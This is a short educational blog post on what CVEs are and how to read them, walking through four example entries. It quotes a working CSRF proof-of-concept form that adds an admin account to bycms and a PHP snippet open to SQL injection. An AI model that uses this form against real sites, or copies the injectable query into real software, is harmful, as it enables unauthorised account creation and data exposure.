DEV Community

Cover image for What are and how to read CVEs (Common Vulnerabilities and Exposures)?
Grzegorz Piechnik
Grzegorz Piechnik

Posted on • Updated on

What are and how to read CVEs (Common Vulnerabilities and Exposures)?

CVE, or Common Vulnerabilities and Exposures, is a public dictionary of registered vulnerabilities and threats in the system. According to the vision of those running the CVE documentation, the dictionary is intended to serve as an industry standard for communication between different teams. Although the creators themselves avoid the term, it is a database of sorts. According to their documentation, a vulnerability is defined as a weakness in a given system (resulting from bugs), while a threat is defined as a violation of security policy. A dictionary of CVEs can be found here.

What a CVE consists of

Each CVE has its own ID, which is constructed as follows:

CVE - Year of submission - Serial number = CVE-2021-38197
Enter fullscreen mode Exit fullscreen mode

An example submission (depending on the information provided) may look like the image below.

what is cve

As we can see, it includes the ID we mentioned, a brief description, a reference, the vulnerable version, the attack vector, its complexity and much more.

CVE examples

We will take a look at the last few vulnerabilities registered in the dictionary.

CVE-2021-38197

After playing CVE, we can learn that the notification is for a library go-unarr used to unpack RAR, TAR, ZIP and 7z archives. As a reference, a link to github is provided, from which we can learn that version 0.1.1 of the library allows the Path Travelsal attack, which in the example results in placing the archive file anywhere on the server.

CVE-2020-18457

We will use notification regarding the bycms content management system as another example. In version 1.3.0, a properly crafted (below) file with a form allows us to launch a CSRF attack. If you don't yet know what it consists of, we refer you to here.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin.php/ucenter/add.html" method="POST">
      <input type="hidden" name="username" value="root" />
      <input type="hidden" name="password" value="11a040841c73c8627c274ba30f8b2123" />
      <input type="hidden" name="mobile" value="1233435346456" />
      <input type="hidden" name="email" value="qweqwe&#64;qq&#46;com" />
      <input type="hidden" name="cover&#95;id" value="" />
      <input type="hidden" name="file&#95;path" value="" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Enter fullscreen mode Exit fullscreen mode

CVE-2020-36458

Using this example, we can see the essence of the CVE vocabulary. Not all reports involve direct attacks on users using the application.

In the CVE we read that the parameters (T, E) for the ReaderResult class were asynchronous. As a result, it allowed for potential memory corruption if multiple threads used these parameters. To understand how this occurs, we need to have a basic understanding of the RUST language.

In documentation we read that parameters use traits (trait) to specify the functionality they implement. An example of a function accepting a generic type "T", implementing the trait displayed.

// Define a function `printer` that takes a generic type `T` which
// must implement trait `Display`.
fn printer<T: Display>(t: T) {
    println!("{}", t);
}
Enter fullscreen mode Exit fullscreen mode

In the aforementioned report, the feature of the T and E parameters was sending(Send), which, as we mentioned, was asynchronous.

CVE-2020-20981

The subject of the request is the Metinfo cms. In its version 7.0.0, it was possible to perform a SQL Blind Injection attack with the help of jdn endpoints. Vulnerable code:

public function dodel(){
global $_M;
$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
if (!$id){
  $this->error($_M['word']['js10']);
}
$id = implode(',',$id);
$del_resutl = DB::query("DELETE FROM {$_M['table']['admin_logs']} WHERE id IN ({$id}) ");
if (!$del_resutl){
  $this->error($_M['word']['opfailed']);
}
Enter fullscreen mode Exit fullscreen mode

In the following line, the code is only filtered by addslashes, which ultimately changes nothing, as we are able to inject a malicious payload further down the line.

$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
Enter fullscreen mode Exit fullscreen mode

Ultimately, the vulnerability results in access to sensitive data.

Sources

https://cve.mitre.org/
https://www.whitesourcesoftware.com/resources/blog/cve-vulnerability/
https://cve.circl.lu/cve/CVE-2021-38197
https://cve.circl.lu/cve/CVE-2020-18457
https://cve.circl.lu/cve/CVE-2020-36458
https://doc.rust-lang.org/rust-by-example/generics/bounds.html#bounds
https://cve.circl.lu/cve/CVE-2020-20981

Top comments (0)